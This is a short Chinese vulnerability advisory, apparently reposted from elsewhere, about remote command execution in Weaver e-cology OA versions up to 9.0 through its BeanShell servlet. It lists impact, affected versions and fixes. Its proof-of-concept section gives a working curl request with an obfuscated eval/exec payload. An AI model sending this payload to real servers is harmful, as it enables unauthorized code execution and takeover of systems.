泛微OA系统多版本存在命令执行漏洞
Posted sylon
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了泛微OA系统多版本存在命令执行漏洞相关的知识,希望对你有一定的参考价值。
0x01漏洞描述
泛微OA办公系统是一款协调办公软件。
泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。
0x02漏洞危害
攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。
0x03影响范围
泛微 e-cology<=9.0
0x04漏洞复现
访问 http://url/weaver/bsh.servlet.BshServlet 输入 payload 如下:
0x05poc
漏洞路径:/weaver/bsh.servlet.BshServlet
exec("whoami")
curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d ‘bsh.script=ev
al%00("ex"%2b"ec("whoami")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw‘
0x06修复方案
1、屏蔽/weaver/*目录的访问;
2、https://www.weaver.com.cn/cs/securityDownload.asp
以上是关于泛微OA系统多版本存在命令执行漏洞的主要内容,如果未能解决你的问题,请参考以下文章